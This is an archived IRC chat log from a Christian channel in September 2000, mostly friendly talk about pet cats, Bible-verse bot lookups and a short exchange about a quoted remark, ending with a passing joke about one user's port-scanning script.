[01:35] <weird> well my dog is a rottweiler
[01:36] <Bond-007> JordAn
[01:36] <Bond-007> :)
[01:36] *** konfused ([email protected]et) has joined #CHristian
[01:36] <eagles`> hey!!!!!! konfused
[01:36] <Colin^> eagles` he hasn't been in today, but his wonderings are going to be nipped in the bud soon
[01:36] <Colin^> ;o)
[01:36] <konfused> hello
[01:37] <eagles`> lol
[01:37] <Raid> My cats name is "Bug" well, it's "Sir red rusty bug." or, Bug for short ;p
[01:37] <eagles`> that seems to be what gets him into trouble
[01:37] <Colin^> :o)
[01:37] <weird> my cat is named jancy
[01:37] *** Eponine` ([email protected]usnet.com.au) has joined #CHristian
[01:37] <Colin^> Raid have you seen my cats pic online yet?
[01:37] *** Disconnected
[01:37] * Raid is away since 01:37:58 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[01:37] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:38] * Raid has returned ( Auto-Away: Not here ) - on 01:38:01 @ 09/09/2000 - Away 0 minutes.

[01:38] *** Rejoined channel #christian
[01:38] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'
[01:38] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:38] <Bond-007> and a bunch of fish that I havent named :)
[01:38] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:38] * eagles` sends for the plumber
[01:38] <Eponine`> I have 3 cats, Chloe, Furby and Sootie
[01:38] <Bond-007> Furby :)
[01:38] <weird> i had a dog called chloe once
[01:38] <konfused> furbies? those evil owl looking things?
[01:38] * Maverick has no cats.
[01:38] <Eponine`> yep :)
[01:38] * weird has no donkeys
[01:38] <konfused> those scare me :\
[01:39] <Eponine`> Furby is really fat and ORANGE and he purrs so loud
[01:39] <konfused> i dont have a donkey either :(
[01:39] <Eponine`> ooh my furby doesn't scare anyone :)
[01:39] <konfused> i gots a kitty tho
[01:39] <Colin^> Maverick Sophie is having kittens want one?
[01:39] *** sansan` ([email protected]da.psi.net) has left #CHristian
[01:39] <Eponine`> wish i had a pic scanned you wouldn't be scared:)
[01:39] <weird> i dooooo but i cant
[01:39] <konfused> heh
[01:40] <Eponine`> I call him Furr for short :) my friend calls him furrball
[01:40] <konfused> well, i guess as long as u can take your cat's batteries out
[01:40] *** Wildernes ([email protected].bright.net) has joined #CHristian
[01:40] <Eponine`> heheheehe
[01:40] <Colin^> Hey Wildernes
[01:40] <konfused> my kittie is mean :\
[01:40] <Wildernes> hey colin
[01:40] <Eponine`> ooh i have a mean kitty too konfused
[01:40] <Colin^> =^¡^=
[01:40] <Eponine`> Chloe is a mean cow of a thing :)
[01:40] <konfused> it waits at the stairs.. and jumps out at u and bites.. an it hurteses
[01:40] <weird> nice one Colin
[01:41] <eagles`> lol
[01:41] * weird is impressed
[01:41] <konfused> he's our little stair troll
[01:41] <Eponine`> hahaha konfused
[01:41] <Eponine`> mine comes up to you and smooches and purrs and rubs against your legs
[01:41] <Eponine`> then when you pat her she bites really hard
[01:41] <Eponine`> draws blood sometimes
[01:41] <Eponine`> im trying to give her away :P
[01:41] <konfused> my cat doesnt do that :\ he only walks up to bite you
[01:42] <Eponine`> she was a nice cat until I got furby, i think she got jealous
[01:42] * Colin^ 's Cat can ride a bike, and makes me dinner
[01:42] <Eponine`> and has never gotten over it
[01:42] <Bond-007> hmmm. heres a great quote:
[01:42] <Bond-007> "Christians are losers."
[01:42] <Bond-007> -Ted Turner
[01:42] <Eponine`> LOL Colin makes you dinner????
[01:42] <Eponine`> Ted Turner must suck then :P
[01:42] <konfused> oh! i want your cat colin
[01:42] <Colin^> Eponine` ;o)
[01:42] <Bond-007> Ted Turner is not that big at thinking up memorable things to say is he?
[01:42] <konfused> does he clean the house too?
[01:42] * eagles` wonders Ted Turner... CNN??
[01:42] <Colin^> konfused I have his pics on my web page
[01:42] <Eponine`> Colin i'll trade you for Chloe?
[01:42] <Bond-007> Ted Turner owns Superstation etc
[01:42] <Bond-007> He owns alot of cable channels
[01:43] <weird> =^!^=
[01:43] <Bond-007> He owns the Atlanta Braves

[01:43] <konfused> is he cooking in the pics?
[01:43] <weird> not the same
[01:43] <Eponine`> :o :o =^.^= :o :o
[01:43] *** Belle707 ([email protected] t) has joined #CHristian
[01:43] <danimal> bond if it is not so memorable then why are you quoteing it?
[01:43] <eagles`> superstation is big in europe
[01:43] * Belle707 sighs ... cant sleep.
[01:43] <eagles`> i watched a bit of it when I was in Sweden oooh 10 years ago
[01:43] <Eponine`> ,,,=^.^=,,, <-- that is Chloe
[01:43] <Colin^> http://mysite.xtra.co.nz/~ColinRHopper/page3.html <---Our cats pics
[01:43] *** Jewelz`` ([email protected]) has joined #CHristian
[01:44] <eagles`> hello Belle707 :))
[01:44] <konfused> heh thats not my kitty he doesnt have clawses
[01:44] <Wildernes> hey belle
[01:44] <Eponine`> i will look at them collie
[01:44] <Belle707> hey Wildernes
[01:44] *** TallCaMan ([email protected]) has joined #CHristian
[01:44] <Colin^> Hi Belle707
[01:44] <Bond-007> danimal: because I just saw it on a website
[01:44] <weird> =^{}^=
[01:44] <weird> aaaaak
[01:44] <Bond-007> It was an atheist and scoffer quote page
[01:45] <Bond-007> We spend the first
[01:45] <Bond-007> to walk and talk and the next twelve telling them to sit down and shut up.
[01:45] <Bond-007> --Phyllis Diller
[01:45] <Bond-007> hehehe
[01:45] <weird> how do ya turn stuff ?
[01:45] <^John^> Colin^ it says your page is down :/
[01:45] <Eponine`> collie: are those kitten photos recent?
[01:45] <danimal> so what is the purpose to quote him?
[01:45] <Eponine`> the orange one looks like furby :)
[01:45] *** twile ([email protected]) Quit (Ping timeout for twile[207.0.112.77])
[01:45] <Colin^> Eponine` one of them is a cat now
[01:45] <^John^> I went there cuz I love kittens
[01:45] <konfused> Oh! cute little kitty kats
[01:45] <Bond-007> danimal: to show how ignorant some people are
[01:46] <^John^> Hey how are u ppl getting it to load
[01:46] *** Twinsen ([email protected] ld-online.no) has joined #CHristian
[01:46] <Colin^> Have a look at Mr Jordan Big Eyes
[01:46] <Eponine`> Colin did you keep any of them?
[01:46] <Eponine`> John try to refresh it?
[01:46] <Colin^> Eponine` yes one of the cameo one
[01:46] <danimal> what makes him ignore by that quote
[01:46] <danimal> hate‚ignorance
[01:46] *** cierra ([email protected]) has joined #CHristian
[01:47] <Bond-007> thinking that Christians are Losers. Its a broad vague ignorant statement.
[01:47] <Raid> Colin^: HEHEHE, nice kitty ;p
[01:47] <danimal> how is it ignorant?
[01:47] <Colin^> Raid he is a great cat
[01:48] <Wildernes> bond: but never underestimate the abiity of the press to quote things out of context.
[01:48] <konfused> silly kittys
[01:48] <Eponine`> Which one is the cameo one Colin?
[01:48] <Wildernes> who knows what he might have actually indended to say?
[01:48] <Colin^> Eponine` the light ginger ones
[01:48] <Colin^> Tes Turnip?
[01:48] <Colin^> Ted Turnip
[01:48] <Bond-007> Does he know every Christian ever alive?
[01:48] <Eponine`> I love orange ones:)
[01:48] *** Philip15 ([email protected]) has joined #CHristian
[01:49] <konfused> aw now i wana go play wif my lil stair troll
[01:49] <konfused> but he'll beat me up :|
[01:49] <danimal> The only thing ignorant here is the standard at which ted judges losing

[01:49] <Bond-007> no. So he shouldn't say "Christians are losers." Its his opinion too. Personally I think we are winners because through Christ we have been saved and will live eternally for ever with the Lord and Saviour.
[01:49] <weird> turnips are a dun color
[01:49] <weird> oops sorry:(
[01:49] <Colin^> turnips are nice in soup
[01:50] <Eponine`> I have 2 kittens in my room with me now, the two nice ones:) they are feeling the heat here in Rocky
[01:50] <Raid> shrug, bugs making a mess with his food bowl.
[01:50] <weird> and roasted n the oven
[01:50] *** Wildernes ([email protected] .bright.net) Quit (Leaving)
[01:50] *** ROCKIN4JC ([email protected]) has joined #CHristian
[01:50] * konfused skips off to find her kitty kat
[01:50] <Colin^> Hey ROCKIN4JC
[01:50] <Raid> He likes to get it out one piece at a time with his paw, and munch it out of his paw.
[01:50] <danimal> bond that's great you have a different opinion
[01:50] <eagles`> lol
[01:50] <Raid> He always leaves big mess, where he drops some of it.
[01:51] <Raid> or starts munching it, and little fragments break off.
[01:51] <ROCKIN4JC> Hey Colin
[01:51] <Eponine`> Dogs have owners, Cats have staff ~~anonomous
[01:51] <Raid> messy mesy kitty
[01:51] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has joined #CHristian
[01:51] <^John^> Colin^ is it listed in the directory?
[01:51] <Colin^> Cats Rule Dogs Drool
[01:51] <konfused> i found my stair troll :)
[01:51] *** ROCKIN4JC ([email protected]) Quit (Leaving)
[01:51] <Raid> Colin^: heheh
[01:51] <Eponine`> hehehe
[01:51] <Raid> konfused: lol ;p
[01:51] <Colin^> ^John^ is what?
[01:51] <^John^> Your web oage
[01:51] <^John^> Page even
[01:52] <Eponine`> I like pigs too (the guinnea kind) they are furry pigs
[01:52] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has left #CHristian
[01:52] <weird> so are you guys seriously all christians?
[01:52] <Eponine`> Colin, Tiger is soooo cute! it's a she isn't it? a tortoise shell?
[01:52] <^John^> I am all a Christian
[01:52] <Bond-007> I am weird
[01:52] <Bond-007> err I am, weird
[01:52] <Jewelz``> weird, not I :)
[01:52] <Colin^> Eponine` yes, she squeeks like a mouse as well
[01:53] <Raid> Eponine`: I dunno about tiger, but I think the mrbig eyes one is a calico?
[01:53] * weird is not convinced
[01:53] <Raid> weird: No, I'm not a christian.
[01:53] <Colin^> weird not everyone in here is
[01:53] <Eponine`> cute colin :)))))))))
[01:53] <Eponine`> what is a calico, Raid? is that the colour?
[01:53] * Raid cat is a purebread long redhaired persian
[01:53] <Colin^> Raid Mr Jordan Big Eyes is the big cat with a coons tail, he is a Maine Coon
[01:53] <Raid> Eponine`: No, it's the bred.
[01:54] <danimal> weird: just like i don't have to believe an arguement to defend it
[01:54] <Raid> Colin^: HAHAHA, seriously?
[01:54] <Raid> he doesn't look like a coon from the pic.
[01:54] <Raid> no wait, I take that back.
[01:54] <Raid> he does.
[01:54] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy majesty all the day long
[01:54] *** Skippii ([email protected] snet.com.au) has joined #CHristian
[01:54] *** TallCaMan ([email protected]) Quit (Leaving)
[01:54] *** Skippii ([email protected] snet.com.au) has left #CHristian
[01:54] <Raid> Colin^: how did you get a maine kitty all the way where you are?

[01:55] <Colin^> Raid he will go for a walk around the block at night with me
[01:55] <weird> calico cats are always female and called tortoiseshell sometimes cos of the colour mix .... this is not a dictionary definition
[01:55] <Raid> weird: No...
[01:55] <Colin^> Raid, someone brought the bereed over here
[01:55] <Raid> weird: I had two male calico kitties.
[01:55] <weird> no way!
[01:55] <Raid> weird: Yes dude.
[01:55] *** Skypark ([email protected]) has joined #CHristian
[01:55] <Skypark> hi all
[01:55] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy majesty all the day long
[01:55] <weird> always female
[01:56] <eagles`> hey Skypark
[01:56] <Raid> weird: hrm.. Nope. Had two calicos, and I know for a fact they were male ;p
[01:56] <eagles`> amen salutar
[01:56] <Colin^> weird yes tortisshell are always female
[01:56] <Skypark> hello big ""
[01:56] <Raid> standard calico
[01:56] <Skypark> hello big "e"
[01:56] <Skypark> :)
[01:56] <weird> than you Colin
[01:56] <weird> k
[01:56] <Raid> they don't have the as big white spot as colins.
[01:56] <Eponine`> oooh calico and tortoishell are the same??
[01:56] <Raid> Eponine`: No
[01:56] <weird> yeah
[01:56] <Raid> They are kinda built like siamese
[01:56] <Raid> long... slender things
[01:57] <weird> torti and callis are the same
[01:57] <weird> mixed breeds but cute
[01:57] <Raid> dude, I swear...
[01:57] <Raid> they were pure calicos
[01:57] <Raid> we had two of them.
[01:58] <weird> there is only only one pure calico. .....
[01:58] <Eponine`> all the tortis I know have attitudes :P
[01:58] <Colin^> calicos are different, Sophoie, one of our kittens is Cameo
[01:58] <Raid> Eponine`: they meow alot too ;p
[01:58] <Eponine`> yep sure do, really cute meows :)
[01:58] <Raid> and I mean alot.
[01:58] <Raid> yes yes
[01:58] <Eponine`> they are demanding!
[01:58] <Raid> Oh indeed
[01:58] <weird> calm down guys
[01:58] <Raid> if you don't pet them right away, they'll go out of there way to get in your way so you do hehe
[01:58] <Eponine`> and they ignore you when they are tired too
[01:59] <Eponine`> hehehehe yep!
[01:59] <Raid> and they dont purr much
[01:59] <Raid> well, they do sometimes, but they meow more
[01:59] <Eponine`> one of mine, licks my fingers non stop
[01:59] <Raid> Bug on the other hand, he's a purrer
[01:59] <Raid> and a lap cat hehe
[01:59] <Eponine`> hehehehe
[01:59] <Eponine`> and a biter when she feels like it
[01:59] *** Tomm ([email protected] lstx.swbell.net) has joined #CHristian
[01:59] <Raid> hes a cuddly bugsy wugsy
[01:59] *** Tomm ([email protected] lstx.swbell.net) has left #CHristian
[02:00] *** Twinsen ([email protected] ld-online.no) has left #CHristian
[02:00] <Eponine`> aww :)
[02:00] <Eponine`> have you got a picture?
[02:00] <Raid> Yep, but no scanner
[02:00] <Raid> heh

[02:00] <Raid> Bright red and orange.
[02:00] <Raid> with the orange stripes hehe
[02:00] <Raid> and the huge paws.
[02:00] <Eponine`> awww :)
[02:00] <Eponine`> both my tortis were strays
[02:00] *** Philip15 ([email protected]) Quit (Broken pipe)
[02:00] <Raid> and hes lazy as heck
[02:00] <Eponine`> they are both dark with flecs of every colour :)
[02:00] <weird> my neice sent me a picture of a big pussy i thought it might be a joke and it was
[02:01] <weird> ie
[02:01] <Raid> I've seen him stretch out in the middle of the kitchen floor. hehe
[02:01] <Eponine`> huge paws are so cute :)
[02:01] <Eponine`> they look like little lion cubs :)
[02:01] <Raid> YES
[02:01] <Raid> he resembles a baby lion or tiger ;p
[02:01] <Eponine`> hehe
[02:01] <Eponine`> kittens rule:)
[02:02] <Raid> but because he has a smushed in face, I have to clean his nose and eyes for him. hehe
[02:02] <Eponine`> awww
[02:02] <Eponine`> my sootie the torti has a smushed face too
[02:02] <Eponine`> i think she might be part persian
[02:02] <Eponine`> her full name is Princess Sootie Lucky Buttons
[02:03] *** triasha ([email protected]) has joined #CHristian
[02:03] <Raid> hehehe
[02:03] <weird> recessive gene the torti thingie
[02:03] <triasha> mesay u there?
[02:03] <Colin^> Have you guys seen those bald cats?
[02:03] <ramdac> ?
[02:04] <Colin^> Ugly looking things
[02:04] <Eponine`> Sphinx?
[02:04] <konfused> those things look cool, lol
[02:04] <weird> (am i living up to my name?)
[02:04] <Eponine`> with huge ears and really bony
[02:04] <tree`> I have... on tv
[02:04] * konfused attempts to be wierder than weird
[02:04] *** ^John^ is now known as JohnBRB
[02:04] <Colin^> Austin Powers has a bald cat
[02:05] <weird> oh ok you have thi stage Konfused:)
[02:05] <tree`> those cats are supposed to be specially breaded
[02:05] <Eponine`> did anyone seen Cats the musical???
[02:05] <konfused> heh
[02:05] <Eponine`> I had front row, it was sooo cool
[02:05] * konfused be's weirder than weird
[02:05] <Eponine`> I got to touch the kittens :)
[02:05] *** thumps ([email protected] l.home.com) has joined #CHristian
[02:05] <konfused> there, how was that? :)
[02:05] *** WingNut ([email protected] .net) has joined #CHristian
[02:05] <Colin^> Hey thumps
[02:05] <Colin^> ...
[02:05] <Colin^> Hi ya WingNut
[02:05] <thumps> grrrrrreetings
[02:05] <thumps> heya Colin
[02:05] <Eponine`> and one of them took an audience member's coat and did little marching girl (marching kitten, you know what i mean) it was soo cool
[02:05] <thumps> ...
[02:05] <thumps> wing
[02:05] <WingNut> Heya, thumps!
[02:05] <WingNut> Hey Colin^!!!! :o)
[02:06] * weird sees everybody luvs Colin
[02:06] *** ramdac ([email protected]. da.uu.net) Quit
[02:06] * weird included

[02:06] <weird> so kewl :)
[02:06] <Raid> Some people say cats are stupid because you can't train them. This isn't true. it's not that you can't train them, it's easier for them to train you. ;p
[02:06] <Eponine`> Colin always meows at me :))))
[02:07] <konfused> my cat plays fetch
[02:07] <Eponine`> hahahaha raid, so true!
[02:07] <Eponine`> konfused, really"??????
[02:07] <Colin^> Eponine` have doene for 4 years or more
[02:07] <konfused> yup, much better than my dog too
[02:07] <Eponine`> yeppers:)
[02:07] <Eponine`> with a toy or what?
[02:07] <WingNut> Raid: I once heard someone make the observation: Humans train dogs, cats train humans, nobody trains cats. So who is smarter?
[02:07] *** sunshineM ([email protected] a.home.com) has joined #CHristian
[02:07] <Raid> WingNut: LOL
[02:07] <konfused> yup :) this little stuffed monkey...
[02:08] <weird> ferrets
[02:08] <eagles`> interesting rofl
[02:08] <WingNut> Hey, sunshineM.
[02:08] *** sunshineM ([email protected] a.home.com) Quit (Read error to sunshineM: EOF from client)
[02:08] <weird> oh and pigs and horses might get a mention
[02:08] <Eponine`> cool, confused :)
[02:08] <Eponine`> LOL wingnut
[02:08] <danimal> does logos have a topical concordance?
[02:08] <Eponine`> knofused, i mean
[02:08] <Eponine`> oops
[02:08] <Eponine`> konfused :)
[02:08] <konfused> heh
[02:08] * eagles` is off to do stuff offline... wish I could remember why I cam on line and hour and a half ago, though
[02:09] <Colin^> danimal he will do simple searches
[02:09] <weird> bye eagles:)
[02:09] <Colin^> Bye eagles
[02:09] <eagles`> ooroo
[02:09] <Eponine`> byee eagles :)
[02:09] <Eponine`> ooroo
[02:09] <konfused> bye eagle
[02:09] <konfused> s
[02:09] <weird> tut such self control:)
[02:10] <weird> i have none
[02:10] * Eponine` either
[02:10] <Raid> Eponine`: My cat seems to know when I'm not feeling well too.
[02:10] <Raid> he'll come over and sit by me, and purr me a little tune.. sometimes even kneed me.
[02:10] <eagles`> !skjv apostle
[02:10] <logos3> Seek Reply: Matthew 10:2, Mark 6:30, Acts 1:2, Acts 1:25, Acts 1:26, Romans 1:1, Romans 1:5, Acts 2:37, Luke 6:13, Acts 2:42, 1 Corinthians 1:1, Acts 2:43, 2 Corinthians 1:1, Galatians 1:1, Ephesians 1:1, Galatians 1:17, Galatians 1:19, Colossians 1:1, Galatians 2:8, 2 Timothy 1:1 ...
[02:10] <triasha> mmmeeeeeeeeesssssssaaaaaaaaayyyyyyyy txt nman dyan
[02:11] <eagles`> wonder if....
[02:11] <Colin^> Raid my cat does that if I am in bed with a BAD migraine, he will come and cuddle up for hours
[02:11] <eagles`> !skjv acts apostle
[02:11] <Raid> when I have the flu it sucks, cause I have to make him get away from me, so I dont get him sick. hehe
[02:11] <logos3> Seek Reply:
[02:11] <eagles`> no you can't use a modifier
[02:11] <weird> dogs lickings are healthy
[02:12] <Eponine`> Wow Raid mine does too :)
[02:12] <Eponine`> when i broke up with a BF and was upset, my cat (the nasty one who was nice back then) wouldnt leave me alone hehehe

[02:12] <Eponine`> cats just seem to know, eh?
[02:12] <Raid> yep
[02:12] <danimal> colin do you believe that telepathy exitst?
[02:12] <Eponine`> i love when they kneed
[02:12] <Raid> bug seemed to know I was talking about him, cause he's perched himself on my lap now.
[02:12] <Eponine`> its so cute
[02:13] <Raid> he ordered me to move my legs so he could sit comfortably. (he has a good sense of how far into my skin he can put his claws.. hehe)
[02:13] <eagles`> sounds like the siamese I used to have
[02:13] <Colin^> danimal I used to do it
[02:13] *** Maverick ([email protected] ise.net.nz) Quit (Ping timeout for Maverick[203-79-65-231.tnt8.paradise.net.nz])
[02:14] <Raid> I consider him to be more then a pet to me. heh
[02:14] <Colin^> So yes I do believe you can talk through it
[02:14] <Eponine`> hehehehe
[02:14] <Raid> hes like.. my best friend.
[02:14] <weird> big brother training of chaquita is kinda flawed
[02:14] <Raid> always there when I need someone to talk too.
[02:14] <danimal> Auras?
[02:14] <Eponine`> mine are my children :)
[02:14] <logos3> talk through what?
[02:14] <Eponine`> Furby is sitting on my computer desk now and purring
[02:14] <weird> BUT
[02:14] <Eponine`> can hardly move my mouse hehehe
[02:14] <logos3> oh :)
[02:14] <weird> very loving
[02:14] <Raid> hahahahaha
[02:14] * Colin^ has to go, Abbigail has made me two big hamburgers(my favourates)
[02:14] <Eponine`> yikes he's nearly falling off the desk but he's still asleep and purring
[02:15] *** eagles` ([email protected]. uu.net) Quit (Pipe broken, plumber sent for, priority low)
[02:15] <Raid> Eponine`: lol
[02:15] <Colin^> take care all
[02:15] <Eponine`> awww byeeee Collies take care
[02:15] <Bond-007> bye Colin^!!!!!!!!!
[02:15] <Skypark> heheheheh
[02:15] <weird> bye Col:)
[02:15] <Colin^> mews Eponine`
[02:15] <Eponine`> mews :)
[02:15] <Colin^> Bye Bond-007, take care
[02:15] <Skypark> na na na na na
[02:15] <Colin^> Bye weird, nice to meet you
[02:15] <Raid> Eponine`: If I don't pet bug when he arrives in my lap, He'll climb on top of the keyboard and sit on it until I acknowledge him.
[02:15] * Eponine` 's Furby is the clumsiest cat ever :)
[02:15] <weird> u 2
[02:15] <Eponine`> LOL Raid, does he try to type???
[02:16] * konfused takes the batteries out of eponine's cat
[02:16] <Raid> Nope. he just knows my attentions on the computer, and he remedies the problem hehe
[02:16] *** jamie^16 ([email protected]) Quit (Why do people cry when they hear the word goodbye!!!!)
[02:16] <Eponine`> lol konfused!
[02:16] *** Colin^ ([email protected]) Quit (And the Band played on................and on................and on..................and on..........................)
[02:16] *** Disconnected
[02:16] * Raid is away since 02:16:45 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[02:16] *** Attempting to rejoin...#CHristian Cannot send to channel
* Timer 100 halted

* Timer 101 halted
[02:16] * Raid has returned ( Auto-Away: Not here ) - on 02:16:48 @ 09/09/2000 - Away 0 minutes.
[02:16] *** Rejoined channel #christian
[02:16] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'
[02:16] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:16] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:16] <Eponine`> aww
[02:16] <Eponine`> wb :)
[02:17] <Eponine`> Raid, sounds like he's got you wrapped around his little paw :)
[02:17] <Raid> lol
[02:17] <Raid> yep.
[02:17] <Bond-007> grrrrrr
[02:17] <Bond-007> stupid internet!
[02:17] <Bond-007> Why must you disconnect her!
[02:18] <Bond-007> I was talking to her asking her what time she wanted to be picked up and she got disconnected
[02:18] <Eponine`> aww poor Bond
[02:19] <Bond-007> That makes me so mad
[02:19] <Bond-007> Its 11:19PM so too late to call
[02:19] <Eponine`> will she come back?
[02:19] <Bond-007> i hope
[02:19] *** jamie^16 ([email protected]) has joined #CHristian
[02:19] <Bond-007> Im gonna goto sleep soon so I can wake up early so I can call her and get directions to her house etc
[02:20] *** KJV1611 ([email protected] do-fl.bitstorm.net) has joined #CHristian
[02:20] *** ZoOrOpA ([email protected]) has joined #CHristian
[02:20] *** AceRadio ([email protected] scymo.swbell.net) has joined #CHristian
[02:21] <Bond-007> well its been almost 5 minutes
[02:21] *** logos3 sets mode: +o ZoOrOpA
[02:21] <Bond-007> i dont think she is coming back
[02:21] *** ZoOrOpA sets mode: -o ZoOrOpA
[02:21] *** Disconnected
[02:21] * Raid is away since 02:21:32 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[02:21] *** Attempting to rejoin...#CHristian Cannot send to channel
[02:21] *** Rejoined channel #christian
[02:21] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'
[02:21] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:21] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:21] <Bond-007> hi ZoOrOpA
[02:21] <weird> i luv these nicks
[02:21] <AceRadio> wb raid
[02:21] <ZoOrOpA> hi
[02:21] <Eponine`> wb Raid
[02:22] *** Luther ([email protected]. net) has joined #CHristian
[02:22] <AceRadio> Welcome to #Christian, luther
[02:23] <AceRadio> has thatcher been on lately?
[02:24] <danimal> yesterday
[02:24] <AceRadio> hmmm
[02:24] *** weird ([email protected] .net) Quit (Leaving)
[02:24] <AceRadio> niv rev 2:3
[02:25] <AceRadio> guess the bots are down right now
[02:25] <danimal> !niv rev 2:3
[02:25] <logos3> danimal: Rev 2:3 "3 You have persevered and have endured hardships for my name, and have not grown weary." (NIV)
[02:25] <AceRadio> gotta use the '!"?
[02:25] <danimal> yup
[02:25] <AceRadio> !niv rev 2:5
[02:25] <logos3> AceRadio: Rev 2:5 "5 Remember the height from which you have fallen! Repent and do the things you did at first. If you do not repent, I will come to you and remove your lampstand from its place." (NIV)

[02:25] <AceRadio> ah, ok
[02:26] <AceRadio> !niv jeremiah 3:8
[02:26] *** TopTed ([email protected]) has joined #CHristian
[02:26] <logos3> AceRadio: Jeremiah 3:8 "8 I gave faithless Israel her certificate of divorce and sent her away because of all her adulteries. Yet I saw that her unfaithful sister Judah had no {fear;} she also went out and committed adultery." (NIV)
[02:26] <AceRadio> Welcome to #Christian, topted
[02:26] <TopTed> hi AceRadio
[02:26] *** ZoOrOpA ([email protected]) Quit (The Moon is up..and over One Tree Hill.....we see the sun go down in your eyes.....)
[02:26] *** Shaina` ([email protected]. com) has joined #CHristian
[02:26] <AceRadio> Welcome to #Christian, shaina`
[02:27] *** CodePoet ([email protected] m) Quit (The quest for faith is a lunar endevour, not warmer and brighter, but darker and wetter.)
[02:27] <AceRadio> !niv jeremiah 4:2
[02:27] <logos3> AceRadio: Jeremiah 4:2 "2 and if in a truthful, just and righteous way you swear, 'As surely as the LORD lives,' then the nations will be blessed by him and in him they will glory.'" (NIV)
[02:27] <Shaina`> thanks for welcome me AceRadio
[02:27] <AceRadio> yw
[02:28] <Shaina`> :)
[02:28] <AceRadio> !niv luke 4:9
[02:28] <logos3> AceRadio: Luke 4:9 "9 The devil led him to Jerusalem and had him stand on the highest point of the temple. 'If you are the Son of God,' he said, 'throw yourself down from here." (NIV)
[02:28] <TacoMan> anyone want to see a funny log message me
[02:28] <TopTed> !kjv proverbs 30:4
[02:28] <logos3> TopTed: Proverbs 30:4 "4 Who hath ascended up into heaven, or descended? who hath gathered the wind in his fists? who hath bound the waters in a garment? who hath established all the ends of the earth? what is his name, and what is his son's name, if thou canst tell?" (KJV)
[02:29] *** Bond-007 ([email protected]) Quit (Ping timeout for Bond-007[17-133.nctimes.net])
[02:29] <AceRadio> !niv psalm 1:45
[02:29] <logos3> AceRadio: Psalm 1:45 "" (NIV)
[02:29] <AceRadio> !niv psalm 14:5
[02:29] <logos3> AceRadio: Psalm 14:5 "5 There they are, overwhelmed with dread, for God is present in the company of the righteous." (NIV)
[02:30] <TopTed> !kjv luke 4:20-21
[02:30] <logos3> TopTed: Luke 4:20-21 "20 And he closed the book, and he gave it again to the minister, and sat down. And the eyes of all them that were in the synagogue were fastened on him. 21 And he began to say unto them, This day is this
[02:30] <logos3> scripture fulfilled in your ears." (KJV)
[02:30] *** Luther ([email protected]. net) has left #CHristian
[02:31] *** TacoMan ([email protected] .net) Quit (Excess Flood)
[02:32] *** charisma ([email protected]) has joined #CHristian
[02:32] <AceRadio> Welcome to #Christian, charisma
[02:33] <Shaina`> how are you AceRadio?
[02:33] *** Helt ([email protected]) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian, helt
[02:33] <AceRadio> shaina- i'm good
[02:33] *** Helt ([email protected]) has left #CHristian
[02:33] <AceRadio> shaina- u?
[02:33] *** bu2zard ([email protected]) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian bu2zard
[02:33] <Shaina`> AceRadio: i'm great thanks :)
[02:34] <bu2zard> hi
[02:34] *** jamie^16 ([email protected]) has left #CHristian
[02:34] *** bu2zard ([email protected]) has left #CHristian
[02:34] *** LARING ([email protected]) has joined #CHristian
[02:34] <AceRadio> Welcome to #Christian, laring
[02:35] *** LARING ([email protected]) has left #CHristian
[02:35] *** space[AW] ([email protected]. net) has joined #CHristian

[02:35] *** jamie^16 ([email protected]) has joined #CHristian
[02:35] <AceRadio> Welcome to #Christian, space[aw]
[02:35] <AceRadio> wb jamie
[02:36] <space[AW]> AceRadio hi.. thanx
[02:36] *** space[AW] is now known as spaceJAM
[02:37] *** aLiCh|gRL ([email protected]) has joined #CHristian
[02:37] <TopTed> oh hum...
[02:37] <AceRadio> Welcome to #Christian, alichigrl
[02:37] <AceRadio> 1:39 am cdt
[02:38] *** AgnusDei ([email protected] y.bellsouth.net) has joined #CHristian
[02:38] *** aLiCh|gRL ([email protected]) Quit (Ping timeout for aLiCh|gRL[210.23.210.216])
[02:38] <Shaina`> it's 2:38am here
[02:38] <AceRadio> Welcome to #Christian, agnusdei
[02:39] <AgnusDei> good evening ace
[02:39] <TopTed> !kjv 1john 2:15
[02:39] <logos3> TopTed: 1John 2:15 "15 Love not the world, neither the things that are in the world. If any man love the world, the love of the Father is not in him." (KJV)
* Timer 100 halted
* Timer 101 halted
[02:39] * Raid has returned ( Auto-Away: Not here ) - on 02:39:14 @ 09/09/2000 - Away 17 minutes.
[02:39] <AceRadio> wb raid
[02:39] <Raid> crud
[02:39] <Raid> I will sleep soon.
[02:39] <Raid> but first, must smoke this cig.
[02:40] <konfused> brr tis cold here
[02:41] <AceRadio> konfused- grab a blanket
[02:41] <konfused> i have one :o
[02:41] *** sunshineM ([email protected] a.home.com) has joined #CHristian
[02:41] <AceRadio> Welcome to #Christian, sunshinem
[02:42] *** WingNut ([email protected] .net) Quit (Ping timeout for WingNut[A020-0450.TULS.splitrock.net])
[02:42] *** Disconnected
Session Close: Sat Sep 09 02:42:36 2000

Session Start: Sat Sep 09 12:25:22 2000
[12:25] *** Now talking in #CHristian
[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC ([email protected] aturn.bbn.com) has joined #CHristian
[12:26] *** Txico ([email protected] eb.co.za) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the channel, all your machines are going to be scanned so be prepared
[12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script off.
